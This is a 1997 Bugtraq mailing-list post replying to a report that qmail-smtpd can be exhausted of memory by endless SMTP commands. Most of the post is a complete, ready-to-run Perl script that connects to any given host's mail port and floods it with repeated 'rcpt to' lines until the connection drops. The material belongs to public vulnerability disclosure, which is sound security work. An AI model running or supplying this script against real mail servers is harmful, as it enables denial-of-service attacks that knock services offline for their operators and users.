Bugtraq mailing list archives
Re: Denial of service (qmail-smtpd)
From: super () UFO ORG (super () UFO ORG)
Date: Thu, 12 Jun 1997 07:04:01 -0700
Date: Wed, 11 Jun 1997 17:30:36 -0400 (EDT) From: Wietse Venema <wietse () wzv win tue nl> To: djb-qmail () koobera math uic edu Subject: Denial of service (qmail-smtpd) While implementing my own mailer, I went over the qmail source code and noticed that qmail is susceptible to a very trivial denial of service attack. By sending SMTP commands of unlimited length, an attacker can make the machine run out of memory, thus rendering it completely unusable. Below is a little program that demonstrates the problem. When I wrote this I was in C mode; it could probably be done with a much smaller PERL program.
You're right, it could. ------------------------------ qmail.pl ------------------------------ #!/usr/local/bin/perl -w # $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $ require 5.002; use strict; use Socket; if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;} my $port = 25; my $proto = getprotobyname("tcp"); my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]"; my $paddr = sockaddr_in($port, $iaddr); socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!"; connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!"; send(SKT,"mail from: <me\@me>\n",0) || die "send() $!"; my $infstr = "rcpt to: <me\@" . $ARGV[0] . ">\n"; print("Attacking..","\n"); while(<SKT>){ send(SKT,$infstr,0) || die "send() $!"; } die "Connection lost!"; ------------------------------ qmail.pl ------------------------------ .--------------------------------. | super () innu org | |--------------------------------| | http://www.ce.net/users/super/ | | Fight SPAM! www.cauce.org | | S@IRC | `--------------------------------'
Current thread:
- Re: Denial of service (qmail-smtpd) super () UFO ORG (Jun 12)